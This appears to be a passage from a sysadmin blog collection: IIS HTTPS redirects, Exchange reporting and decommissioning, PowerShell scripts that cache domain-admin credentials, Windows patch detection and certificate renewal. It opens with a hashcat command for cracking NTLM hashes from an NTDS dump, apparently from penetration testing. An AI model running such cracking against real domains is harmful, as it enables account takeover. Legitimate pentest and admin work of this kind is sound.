hashcat -m 1000 -w 3 -a 0 -p : --session=all --username --show -o ~/pentest/pentest_1.out --outfile-format=3 ~/pentest/pentest-ntlm-extract.ntds --potfile-path ~/pentest/pentest.out
  4. Plain PowerShell

Microsoft IIS: How to Forward from HTTP to HTTPS

1. Apply the URL Rewrite module as required:
– https://www.iis.net/downloads/microsoft/url-rewrite
– Extract and install it

2. Run InetMgr.exe > select the target website > double-click on Url Rewrite > click “Add Rule(s)” from the right-side menu > high-light “Blank rule” > OK > give this rule a name (e.g. crm.kimconnect.com HTTP to HTTPs) > Set the Inbound Rule as follows:
– Requested URL = Matches the Pattern
– Using = Regular Expressions
– Pattern = (.*)
– Ignore Case = checked

At Conditions window > set Logical grouping = Match All > click Add
— Condition Input = {HTTPS}
— Check if input string = Matches the Pattern
— Pattern = ^OFF$
— Ignore case = checked

At Action window > make these settings > click Apply when done
– Action type = Redirect
– Action Properties
— Redirect URL = https://{HTTP_HOST}{REQUEST_URI} OR https://{HTTP_HOST}/{R:1}
— Append query string = checked
— Redirect type = Permanent (301)

Double-click SSL Setting > ensure Require SSL is not checked

Right-click the website > Explore > locate web.config (if exists) > ensure that the following content exists within that file

    <system.webServer>
<modules>
<add name="WebApiUrlRewriteModule" type="Microsoft.Crm.Application.Components.Modules.WebApiUrlRewriteModule, Microsoft.Crm.Application.Components.Application, Version=8.0.0.0, Culture=neutral, PublicKeyToken=xxxxxxxxxxxxxxxx" preCondition="managedHandler" />
</modules>
</system.webServer>

If the WebApiUrlRewriteModule is not defined, add this <rewrite> rule:

<configuration>
<system.webServer>
<!-- Added by KimConnect 8/15/19
URL Rewrite to enforce HTTP forwarding to HTTPS
-->
<rewrite>
<rules>
<rule name="HTTPS force" enabled="true" stopProcessing="true">
<match url="(.*)" />
<conditions>
<add input="{HTTPS}" pattern="^OFF$" />
</conditions>
<action type="Redirect" url="https://{HTTP_HOST}{REQUEST_URI}" redirectType="Permanent" />
</rule>
</rules>
</rewrite>
<!-- Added by KimConnect 8/15/19
URL Rewrite to enforce HTTP forwarding to HTTPS
-->
</system.webServer>
</configuration>

Perform IISreset > verify that http://crm.kimconnect.com automatically forwards to https://crm.kimconnect.com; otherwise, reverse the changes and call Mr Google.
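
A quick way to verify the 301 from PowerShell before involving a browser; a sketch assuming the crm.kimconnect.com site used above and Windows PowerShell 5.x behavior, where exceeding -MaximumRedirection raises an error that still carries the response:

try {
Invoke-WebRequest -Uri 'http://crm.kimconnect.com' -MaximumRedirection 0 -UseBasicParsing -ErrorAction Stop
} catch {
$response = $_.Exception.Response
"{0} -> {1}" -f [int]$response.StatusCode, $response.Headers['Location']  # expect: 301 -> https://crm.kimconnect.com/...
}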

PowerShell: Microsoft Exchange Admin Reports

Function importExchangeModule{
$snapinLoaded = (get-pssnapin microsoft.exchange.management.* -ErrorAction SilentlyContinue).Name

$exchangeVersion=(GCM Exsetup.exe | % {$_.FileVersionInfo}).ProductVersion
$exchangeVersionMajor=$exchangeVersion.Substring(0,2);
$exchangeVersionMinor=$exchangeVersion.Substring(3,2);
$exchangeYear=0;
if (!($snapinLoaded)){

switch ([int]$exchangeVersionMajor){
6 {
$exchangeYear=2003;
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin -ErrorAction Continue;
break;
}
8 {
$exchangeYear=2007;
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin -ErrorAction Continue;
break;
}
14 {
$exchangeYear=2010;
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010 -ErrorAction Continue;
break;
}
15 {
switch ([int]$exchangeVersionMinor){
0 {$exchangeYear=2013; break;}
1 {$exchangeYear=2016; break;}
2 {$exchangeYear=2019; break;}
}
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -ErrorAction Continue;
break;
}
}
"Exchange Server $exchangeYear is detected...`nThe appropriate Exchange PowerShell Snap-In has been imported...";
}
}

# This function is deprecated
function addAdminRoles{
$roles="Mailbox Import Export","Mailbox Search","Discovery Management"
# Exchange Admins need membership in Organization Management plus these roles to perform operations on mailboxes: Mailbox Import Export, Mailbox Search, and Discovery Management
New-ManagementRoleAssignment -Name "Import Export_Organization Management" -SecurityGroup "Organization Management" -Roles $roles
}

#### Export all mailboxes to a network backup location ####
function exportAllMailboxes{
$storageUNC="\\FILESHERVER01\Backups\PSTs"
function monitorCompletion($check){
$migrationStatus=(Get-MailboxExportRequest -Mailbox $check).Status
$completed=$migrationStatus -like 'Completed'
if (!($completed)){
Write-Host -NoNewline "Waiting for $check batch to complete..."
$dots=50
$timeout=10 #10 seconds
while (!($completed)) {
$dots-=1;
#$timeout-=2; # Timeout is optional
#if($timeout -lt 0){"$timeout seconds have passed. Skip this waiting."; continue;}
if ($dots -eq 0){Write-Host ".";$dots=50;} # reload dots
else {Write-Host -NoNewline "."}
Start-Sleep -s 2
$completed=(Get-MailboxExportRequest -Mailbox $check).Status -like 'Completed' # re-query the export request status
}
}
Write-Host "$check batch is completed."
}

$userAliases=Get-Mailbox -ResultSize unlimited
foreach ($userAlias in $userAliases){
New-MailboxExportRequest -Mailbox $userAlias -FilePath "$storageUNC\$userAlias.pst"
sleep 10;
# monitorCompletion $userAlias;
}
}

#### Create roles report ####
function rolesReport{
$rolesReportFile="C:\rolesReport.csv"
$roles="Organization Management","Discovery Management"
$report=foreach ($role in $roles){
"$role`:`r-------------------------------------------------";
Get-RoleGroupMember $role | Format-Table;
"`n";
}
$report=$report|Out-String
$report+="`nOther Roles Assignments:`r-------------------------------------------------";
$assignments="Mailbox Import Export","Mailbox Search"
$report+=$assignments | %{Get-ManagementRoleAssignment -Role $_} | Select RoleAssigneename,Role,EffectiveUserName | Out-String
$report | Out-File -FilePath $rolesReportFile
}

#### Create mailbox report ####
function mailboxesReport{
importExchangeModule;
$reportFile="C:\mailboxesReport.csv"
$sum=0;
$report=@()
$mailboxes=Get-Mailbox -ResultSize Unlimited | sort;
foreach ($mailbox in $mailboxes) {
$mailboxObject = (Get-MailboxStatistics $mailbox.SamAccountName)
$totalItems=$mailboxObject.TotalItemSize.Value.ToMB();
$totalDeleted=$mailboxObject.TotalDeletedItemSize.Value.ToMB();
$thisMailboxSize=$totalItems+$totalDeleted;
$report+=New-Object PsObject -property @{
'DisplayName'=$($mailbox.DisplayName)
'SamAccountName'=$($mailbox.SamAccountName)
'PrimarySmtpAddress'=$($mailbox.PrimarySmtpAddress)
'ServerName'=$($mailbox.ServerName)
'LastLogonTime'=$($mailboxObject.LastLogonTime)
'Database'=$($mailbox.Database)
'IsMailboxEnabled'=$($mailbox.IsMailboxEnabled)
'thisMailboxSize'=[int]$thisMailboxSize;
}
$sum+=$thisMailboxSize;
}
#$sumGB=$sum/1024;
$report+=New-Object PsObject -property @{
'DisplayName'="Total Storage For All Mailboxes"
'SamAccountName'=''
'PrimarySmtpAddress'=''
'ServerName'=''
'LastLogonTime'=''
'Database'=''
'IsMailboxEnabled'=''
'thisMailboxSize'=[int]$sum;
}
$report | Export-Csv -Path $reportFile -NoTypeInformation
"Reviewing exported contents...`n"
Import-Csv -Path $reportFile
}
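
A possible invocation order for the functions above, run from a session where the Exchange snap-in can be loaded (exportAllMailboxes is left commented out because it touches every mailbox):

importExchangeModule;
rolesReport;
mailboxesReport;
# exportAllMailboxes;   # uncomment to export every mailbox to the $storageUNC path defined above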

Exchange Server Decommissioning

Exchange hosts being decommissioned should have all of their Exchange services disabled. Thereafter, we may safely turn these Exchange servers off without interrupting email services.

Deleting Exchange servers isn't usually recommended, as there are risks involved. We could choose to archive the virtual machine files onto an external hard drive to save space on production VM hosts. This is typically the extent of a decom task, and I recommend pausing decom activities at this phase so we retain the ability to "spin up" the machines should they turn out to contain email data that is unknown at this time.

Optionally, we may choose to fully purge Exchange servers. Here are the steps:

If the server is still online, start its Exchange services and move its public folder replicas to another Exchange host using these commands
$decomServers="MAIL02","MAIL03"
$productionServer="MAIL007"
$decomServers | %{MoveAllReplicas -SourceServer $_ -TargetServer $productionServer}

Clear all remnants of the downed server from Active Directory – be advised that this is irreversible without AD restores:
-Connect to the domain controller
-Launch the run dialog (Windows Key + R)
-Type in the command "adsiedit.msc" and then press "OK"
-Right-click on the console, then "Connect to:"
-In the connection dialog, select "Well known Naming Context"
-In the drop-down menu, select "Configuration"
-Expand "CN=Configuration [domain]\CN=Services\CN=Microsoft Exchange\CN=[organization]\CN=Administrative Groups\CN=Servers"
-Right-click on the dead server and pick "Delete"
-We also need to delete the database information; navigate to "CN=Configuration [domain]\CN=Services\CN=Microsoft Exchange\CN=[organization]\CN=Administrative Groups\CN=Databases"
-Expand each item to find which one is related to the old server, then delete it as well.
-Launch Server Manager > Navigate to Roles > Active Directory Domain Services > Active Directory Users and Computers > $domain > Microsoft Exchange Security Groups > Exchange Servers > right-click the decommissioned server > Remove, to take it out of the Exchange Servers / Exchange Trusted Subsystem membership
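
Before deleting anything in adsiedit.msc, a read-only sketch (assuming the RSAT ActiveDirectory module is available) can help confirm which Exchange server objects still exist in the Configuration partition:

# Read-only inventory of Exchange server objects in the Configuration naming context
Import-Module ActiveDirectory
$configNC = (Get-ADRootDSE).configurationNamingContext
Get-ADObject -SearchBase $configNC -LDAPFilter '(objectClass=msExchExchangeServer)' | Select-Object Name, DistinguishedName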

PowerShell: Obtain Domain Admin Credential and Save It as an XML for Subsequent Execution

Working Version:
# Initialize with defaults
$credFileExists=$False

# This function is a workaround to the issue of variable $PSCommandPath being inaccessible outside of a function
function setCredentialFilePaths($userID){
# Export some variables
$GLOBAL:scriptPath=Split-Path -Path $PSCommandPath
$GLOBAL:credentialsFolder="$scriptPath\Credentials"
$GLOBAL:credentialFile="$credentialsFolder\"+"$userID`.clixml"
}

function checkFile($file){
$fileExists=[System.IO.File]::Exists($file)
if($fileExists){return $True}else{return $False;}
}

function checkCredentialFile($userID){
# Export some variables
$GLOBAL:path=Split-Path -Path $PSCommandPath
$GLOBAL:folder="$path\Credentials"
$GLOBAL:credentialFile="$folder\"+"$userID`.clixml"
return (checkFile $credentialFile);
}

# Check whether a given username matches the list of Domain Admins
function validateDomainAdminMembership{
param (
[string]$username
)
$matchedAdmin=$username -in $domainAdmins
if($matchedAdmin){
Write-Host "$username is a Domain Admin";
return $True;
}else{
Write-Host "$username not a Domain Admin.";
return $False;
}
}

function testCredential{
param (
[string]$username,
[securestring]$password
)
$plaintextPassword = (New-Object System.Management.Automation.PSCredential 'N/A',$password).GetNetworkCredential().Password
# Note: $domainObject is expected to hold the domain's LDAP path, e.g. "LDAP://dc=kimconnect,dc=com"
$domainBindTest = (New-Object System.DirectoryServices.DirectoryEntry($domainObject,$username,$plaintextPassword)).DistinguishedName
if ($domainBindTest){return $True;} else{Return $False;}
}

function obtainDomainAdminCred{
$domainAdmins=(Get-ADGroupMember -Identity "Domain Admins" -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$global:cred=$False
do {
$providedID=Read-Host -Prompt 'Input a domain admin username'
# Check if credential file exists
If (!(checkCredentialFile $providedID)){
If (validateDomainAdminMembership $providedID){
$providedPassword = Read-Host -assecurestring "Please enter the password"
#$providedPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password))
#$providedCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword
$goodCredential=testCredential -username $providedID -password $providedPassword
if($goodCredential){
"Domain Admin Credential validated!";
$GLOBAL:user=$providedID
$GLOBAL:cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword;
saveCredentialToXml $providedID;
#return $True;
}
else{
"Password doesn't match.";
$global:cred=$False;
#return $False;
}
}else{
"Try again..."
#return $False;
}
}else{"This credential has already been saved previously.";break;}
} until ($cred)
}

function saveCredentialToXml($userID){
setCredentialFilePaths $userID
"Checking $credentialFile...";
If (!(checkFile $credentialFile)){
# Create folder if it doesn't exist
if(!(Test-Path -Path $credentialsFolder)){New-Item -path $credentialsFolder -type directory;}
"This credential has not been saved previously.`nSaving now...";
$cred | Export-Clixml $credentialFile;
}
}

function getCredentialfromXML($file){
checkCredentialFile $user
if (checkFile $file){
"Credential found...`n";
# Export stored XML credential
$GLOBAL:xmlCred=Import-clixml $file
}else{
"Credential NOT found...`n";
$GLOBAL:xmlCred=$null
pause;
break;
}
}

function runasDomainAdmin{

If (checkCredentialFile $env:USERNAME){
# Change the title and background color to signify an elevated session
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated as Domain Admin)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
"This script has been relaunched in the context as a member of Domain Admins with the ID: $(whoami)";
}else{
obtainDomainAdminCred;
getCredentialfromXML $credentialFile;
$runasUser="$env:USERDOMAIN\"+$xmlCred.GetNetworkCredential().username
$runasPassword=ConvertTo-securestring $xmlCred.GetNetworkCredential().password -AsPlainText -Force
$runasCred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $runasUser,$runasPassword
Start-Process powershell.exe -Credential $runasCred -NoNewWindow -ArgumentList "Start-Process powershell.exe -Verb runAs $PSCommandPath"

# Exit from the current process
exit
}

}

runasDomainAdmin;
"Now, we can execute other functions..."
pause;
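
On a later run by the same user on the same machine, the saved clixml can be rehydrated directly; a minimal sketch (SERVER01 is a placeholder, and the credential is assumed to have been saved under the current username in the Credentials folder used above):

$savedCred = Import-Clixml "$PSScriptRoot\Credentials\$env:USERNAME`.clixml"
Invoke-Command -ComputerName 'SERVER01' -Credential $savedCred -ScriptBlock { hostname }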
Another Working Version
#### Run As Exchange Admin (Enterprise Admins) ####

# Initialize with defaults
$credFileExists=$False
$groupName="Enterprise Admins"
# $cred=[System.Net.CredentialCache]::DefaultNetworkCredentials; # this credential parsing doesn't work

# This function is a workaround to the issue of variable $PSCommandPath being inaccessible outside of a function
function setCredentialFilePaths($userID){
# Export some variables
$GLOBAL:scriptPath=Split-Path -Path $PSCommandPath
$GLOBAL:credentialsFolder="$scriptPath\Credentials"
$GLOBAL:credentialFile="$credentialsFolder\"+"$userID`.clixml"
}

function checkFile($file){
$fileExists=[System.IO.File]::Exists($file)
if($fileExists){return $True}else{return $False;}
}

function checkCredentialFile($userID){
# Export some variables
$GLOBAL:path=Split-Path -Path $PSCommandPath
$GLOBAL:folder="$path\Credentials"
$GLOBAL:credentialFile="$folder\"+"$userID`.clixml"
return (checkFile $credentialFile);
}

# Check whether a given username matches the list of Domain Admins
function validateDomainAdminMembership{
param (
[string]$username
)
$matchedAdmin=$username -in $exchangeAdmins
if($matchedAdmin){
Write-Host "$username is an Exchange Admin";
return $True;
}else{
Write-Host "$username not an Exchange Admin.";
return $False;
}
}

function testCredential{
param (
[string]$username,
[securestring]$password
)
$plaintextPassword = (New-Object System.Management.Automation.PSCredential 'N/A',$password).GetNetworkCredential().Password
# Note: $domainObject is expected to hold the domain's LDAP path, e.g. "LDAP://dc=kimconnect,dc=com"
$domainBindTest = (New-Object System.DirectoryServices.DirectoryEntry($domainObject,$username,$plaintextPassword)).DistinguishedName
if ($domainBindTest){return $True;} else{Return $False;}
}

function obtainExchangeAdminCred{
$exchangeAdmins=(Get-ADGroupMember -Identity $groupName -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$global:cred=$False
do {
$providedID=Read-Host -Prompt 'Input a domain admin username'
# Check if credential file exists
If (!(checkCredentialFile $providedID)){
If (validateDomainAdminMembership $providedID){
$providedPassword = Read-Host -assecurestring "Please enter the password"
#$providedPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password))
#$providedCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword
$goodCredential=testCredential -username $providedID -password $providedPassword
if($goodCredential){
"Domain Admin Credential validated!";
$GLOBAL:user=$providedID
$GLOBAL:cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword;
saveCredentialToXml $providedID;
#return $True;
}
else{
"Password doesn't match.";
$global:cred=$False;
#return $False;
}
}else{
"Try again..."
#return $False;
}
}else{"This credential has already been saved previously.";break;}
} until ($cred)
}

function saveCredentialToXml($userID){
setCredentialFilePaths $userID
"Checking $credentialFile...";
If (!(checkFile $credentialFile)){
# Create folder if it doesn't exist
if(!(Test-Path -Path $credentialsFolder)){New-Item -path $credentialsFolder -type directory;}
"This credential has not been saved previously.`nSaving now...";
$cred | Export-Clixml $credentialFile;
}
}

function getCredentialfromXML($file){
checkCredentialFile $user
if (checkFile $file){
"Credential found...`n";
# Export stored XML credential
$GLOBAL:xmlCred=Import-clixml $file
}else{
"Credential NOT found...`n";
$GLOBAL:xmlCred=$null
pause;
break;
}
}

function runasExchangeAdmin{

If (checkCredentialFile $env:USERNAME){
# Change the title and background color to signify an elevated session
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated as Exchange Admin)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
"This script has been relaunched in the context of a member of $groupName with the ID: $(whoami)";
}else{
obtainExchangeAdminCred;
getCredentialfromXML $credentialFile;
$runasUser="$env:USERDOMAIN\"+$xmlCred.GetNetworkCredential().username
$runasPassword=ConvertTo-securestring $xmlCred.GetNetworkCredential().password -AsPlainText -Force
$runasCred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $runasUser,$runasPassword

# Export the global credential to be used in subsequent functions
$GLOBAL:globalCred=$runasCred

# Start-Process powershell.exe -Credential $runasCred -NoNewWindow -ArgumentList "Start-Process powershell.exe -Verb runAs $PSCommandPath"
# Exit from the current process
# exit
}

}

runasExchangeAdmin;
"Enterprise Admin Credential has been loaded. Now connecting to remote server..."
################################################################################################################

$exchangeServer="EXCH02"
function enterPsSessionRemote($server){
Enter-PSSession -ComputerName $server -Credential $globalCred
}
enterPsSessionRemote $exchangeServer
Work-in-Progress Version
function saveCredAsXML{
# Save Credentials into XML file for future use
$domain=$env:USERDOMAIN
$goodCredential=$False
$credentialsFolder="$scriptPath\Credentials"
$credentialsFolderExists=[System.IO.Directory]::Exists($credentialsFolder)
If(!($credentialsFolderExists)){mkdir $credentialsFolder;}

# Obtain username to check whether such credential has been saved prior
$user=(Read-Host -Prompt 'Input an Administrator User ID');
$credentialFile="$credentialsFolder\"+"$user`.clixml"
$credentialFileExists=[System.IO.File]::Exists($credentialFile)
if(!($credentialFileExists)){
"This credential has not been saved previously.";
$GLOBAL:repromptUsername=$False;
$goodCredential=$False;
}

function getCredential{
If ($repromptUsername){
$GLOBAL:user=(Read-Host -Prompt 'Input an Administrator User ID');
}
$GLOBAL:credentialFile="$credentialsFolder\"+"$user`.clixml"
$userID = "$domain\"+"$user"
$securedValue = (Read-Host -AsSecureString -Prompt "Input the password for account $userID")
$password = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($securedValue))
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$GLOBAL:cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userID,$pass
$GLOBAL:credentialFile="$credentialsFolder\"+"$user`.clixml"
$GLOBAL:credentialFileExists=[System.IO.File]::Exists($credentialFile)
}

function testCredential{
#$domainAdmins=(Get-ADGroupMember -Identity "Domain Admins" -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$connection=connect-viserver $vSpheres[0] -Protocol https -Credential $cred -ErrorAction SilentlyContinue
if($connection -eq $null) {
write-host "No connected servers or credential doesnt work."
$GLOBAL:goodCredential=$false;
$GLOBAL:repromptUsername=$True;
}
else{
#"Credential works. Thus, it has been saved at $credentialFile for future use."
Disconnect-VIServer -Server $global:DefaultVIServers -Force -Confirm:$false
cls;
$cred | Export-Clixml $credentialFile;
#$GLOBAL:goodCredential=$True;
break;
}
}

If(!($credentialFileExists)){
# Test credential and reprompt if it doesn't work
while ($goodCredential -eq $False){
getCredential;
testCredential;
}
}
}

######################################################

# Check whether a given username matches the list of Domain Admins
function validateDomainAdminMembership{
param (
[string]$username
)
$matchedAdmin=$username -in $domainAdmins
if($matchedAdmin){
Write-Host "$username is a Domain Admin";
return $True;
}else{
Write-Host "$username not a Domain Admin.";
return $False;
}
}

function testCredential{
param (
[string]$username,
[securestring]$password
)
$plaintextPassword = (New-Object System.Management.Automation.PSCredential 'N/A',$password).GetNetworkCredential().Password
# Note: $domainObject is expected to hold the domain's LDAP path, e.g. "LDAP://dc=kimconnect,dc=com"
$domainBindTest = (New-Object System.DirectoryServices.DirectoryEntry($domainObject,$username,$plaintextPassword)).DistinguishedName
if ($domainBindTest){return $True;} else{Return $False;}
}

function obtainDomainAdminCred{
$domainAdmins=(Get-ADGroupMember -Identity "Domain Admins" -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$global:cred=$False
do {
$providedID=Read-Host -Prompt 'Input a domain admin username'
if (validateDomainAdminMembership $providedID){
$providedPassword = Read-Host -assecurestring "Please enter the password"
#$providedPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password))
#$providedCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword
$goodCredential=testCredential -username $providedID -password $providedPassword
if($goodCredential){
"Domain Admin Credential validated!";
$GLOBAL:user=$providedID
$GLOBAL:cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword;
#return $True;
}
else{
"Password doesn't match.";
$global:cred=$False;
#return $False;
}
}else{
"Try again..."
#return $False;
}
} until ($cred)
}

function validateCurrentAccountAsDomainAdmin{
if((whoami /groups) -match 'domain admins'){
# "This account is a Domain Admins member";
return $True;
}else{
# "This account is NOT a Domain Admins member";
return $False;
}
}

function checkFile($file){
$fileExists=[System.IO.File]::Exists($file)
if($fileExists){return $True}else{return $False;}
}

function saveCredentialToXml($username){
$scriptName=$PSCommandPath
$scriptPath=Split-Path -Path $scriptName
$GLOBAL:credentialsFolder="$scriptPath\Credentials"
$GLOBAL:credentialFile="$credentialsFolder\"+"$user`.clixml"

"Checking $credentialFile...";
If (!(checkFile $credentialFile)){
# Create folder if it doesn't exist
if(!(Test-Path -Path $credentialsFolder)){New-Item -path $credentialsFolder -type directory;}
"This credential has not been saved previously.`nSaving now...";
$cred | Export-Clixml $credentialFile;
}else{
"This credential file already exists.'nSkipping..."
}
}

<# Since Windows intentionally does not expose the credentials of the currently logged-on user for security reasons, the current user's credentials cannot be exported.
If(validateCurrentAccountAsDomainAdmin){
"Current Login User is a Member of Domain Admins";
$cred=[System.Net.CredentialCache]::DefaultNetworkCredentials;
saveCredentialToXml $user;
}else{
"Current Login User is NOT a Member of Domain Admins.";


}
#>

function getCredentialfromXML($file){
# Export stored XML credential
$GLOBAL:xmlCred=Import-clixml $file
}

obtainDomainAdminCred;
saveCredentialToXml $user;
getCredentialfromXML $credentialFile;
$xmlCred;
pause;

PowerShell: Detect Windows Version

This little snippet is reusable on many occasions where Windows version targeting is required.

function detectWindowsVersion{
# Display Windows Version Name
# $versionDigits=[Environment]::OSVersion.Version
# (Get-WmiObject -class Win32_OperatingSystem).Caption
$windowsOS=Get-WmiObject -class Win32_OperatingSystem
$windowsName=$windowsOS.Caption
$windowsServicePack=$windowsOS.ServicePackMajorVersion
$releaseID=(Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion").ReleaseID;

switch -wildcard ($windowsName){
"Microsoft Windows XP*"{
"Windows XP is way out of date. Turn it off asap."
}
"Microsoft Windows 7*"{
"$windowsName has been detected...";
if ($windowsServicePack -eq 1){
# Windows 7 Service Pack 1 / Windows Server 2008 R2 Service Pack 1
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows6.1-kb4103718-x64_c051268978faef39e21863a95ea2452ecbc0936d.msu"
$GLOBAL:kb="KB4103718"
}else{
"Windows 7 is no longer being supported by Michael Shop..."
}
break;
}
"Microsoft Windows Server 2008*"{
"$windowsName has been detected...";
if ($windowsName -like "Microsoft Windows Server 2008 R2*"){
# Windows 7 Service Pack 1 / Windows Server 2008 R2 Service Pack 1
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows6.1-kb4103718-x64_c051268978faef39e21863a95ea2452ecbc0936d.msu"
$GLOBAL:kb="KB4103718"
}else{
"Windows 2008 is no longer being supported by Michael Shop..."
}
break;
}
"Microsoft Windows Server 2012*"{
if ($windowsName -like "Microsoft Windows Server 2012 R2*"){
"Microsoft Windows Server 2012 R2 has been detected...";
# Windows 8.1 / Windows Server 2012 R2
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows8.1-kb4103725-x64_cdf9b5a3be2fd4fc69bc23a617402e69004737d9.msu"
$GLOBAL:kb="KB4103725"
}else{
"Microsoft Windows Server 2012 has been detected...";
# Windows Server 2012 Default
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/04/windows8-rt-kb4103730-x64_1f4ed396b8c411df9df1e6755da273525632e210.msu"
$GLOBAL:kb="KB4103730"
}
break;
}
"Microsoft Windows Server 2016*"{
"$windowsName release ID $releaseID has been detected...";
switch ($releaseID){
1607{
# RS1 - Windows 10 version 1607 / Windows Server 2016
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows10.0-kb4103723-x64_2adf2ea2d09b3052d241c40ba55e89741121e07e.msu"
$GLOBAL:kb="kb4103723"
}
1709{
# RS3 - Windows 10 version 1709 / Windows Server 2016 version 1709
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103727-x64_c217e7d5e2efdf9ff8446871e509e96fdbb8cb99.msu"
$GLOBAL:kb="KB4103727"
}
1803{
# RS4 - Windows 10 1803 / Windows Server 2016 version 1803
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103721-x64_fcc746cd817e212ad32a5606b3db5a3333e030f8.msu"
$GLOBAL:kb="KB4103721"
}
}
break;
}
"Microsoft Windows 10*"{
"$windowsName release ID $releaseID has been detected...";
switch ($releaseID){
1607{
# RS1 - Windows 10 version 1607
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows10.0-kb4103723-x64_2adf2ea2d09b3052d241c40ba55e89741121e07e.msu"
$GLOBAL:kb="KB4103723"
}
1703{
# RS2 - Windows 10 version 1703
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103731-x64_209b6a1aa4080f1da0773d8515ff63b8eca55159.msu"
$GLOBAL:kb="KB4103731"
}
1709{
# RS3 - Windows 10 version 1709 / Windows Server 2016 version 1709
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103727-x64_c217e7d5e2efdf9ff8446871e509e96fdbb8cb99.msu"
$GLOBAL:kb="KB4103727"
}
1803{
# RS4 - Windows 10 1803 / Windows Server 2016 version 1803
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103721-x64_fcc746cd817e212ad32a5606b3db5a3333e030f8.msu"
$GLOBAL:kb="KB4103721"
}
}
break;
}
}
}

detectWindowsVersion;
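Below is a hedged sketch of how the $source and $kb globals set by this function might be consumed; the temp path and the wusa.exe switches are assumptions, not part of the original snippet, and Invoke-WebRequest requires PowerShell 3.0+.

# Hedged sketch: download and quietly install the patch selected above ($source and $kb are set by detectWindowsVersion)
if($source -and $kb){
$msuFile="$env:TEMP\$kb.msu" # temp path is an assumption
Invoke-WebRequest -Uri $source -OutFile $msuFile
Start-Process -FilePath wusa.exe -ArgumentList "`"$msuFile`" /quiet /norestart" -Wait
}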

Microsoft Exchange Server Certificates

When Exchange Server certificates expire, it’s the System Administrator’s responsibility to update those certs. Here’s a sequence of execution to ensure server uptime.

1. Run inetmgr.exe (Internet Information Services Manager)

  • Default Web Site:
    – https * 443 => fqdn public certificate (e.g. Issued To = *.kimconnect.com; Issued By = “DigiCert SHA2 High Assurance Server CA”)
    – https 127.0.0.1 443 => fqdn public certificate
  • Exchange Back End:
    – https * 444 => private server certificate (e.g. Issued To = exch01.intranet.kimconnect.com, Issued By = KimConnect SHA2 CA)

2. Run services.msc to restart these services

  • IIS Admin Service (IISReset /noforce)
  • Microsoft Account Sign-in Assistant
  • Microsoft Exchange Information Store
  • Microsoft Exchange Mailbox Assistants
  • Microsoft Exchange Forms-Based Authentication Service (may not be available on some instances)
  • Start an EMS > C:\Program Files\Microsoft\Exchange Server\V15\Bin\UpdateCas.ps1
  • Run inetmgr.exe > Reset the OWA virtual directory

3. Check Exchange Service Health to validate that there are no ServicesNotRunning items

[PS] C:\Windows\system32>Test-ServiceHealth

Role : Mailbox Server Role
RequiredServicesRunning : True
ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeDelivery, MSExchangeIS,
MSExchangeMailboxAssistants, MSExchangeRepl, MSExchangeRPC, MSExchangeServiceHost,
MSExchangeSubmission, MSExchangeThrottling, MSExchangeTransportLogSearch, W3Svc, WinRM}
ServicesNotRunning : {}

Role : Client Access Server Role
RequiredServicesRunning : True
ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeIMAP4, MSExchangeMailboxReplication,
MSExchangeRPC, MSExchangeServiceHost, W3Svc, WinRM}
ServicesNotRunning : {}

Role : Unified Messaging Server Role
RequiredServicesRunning : True
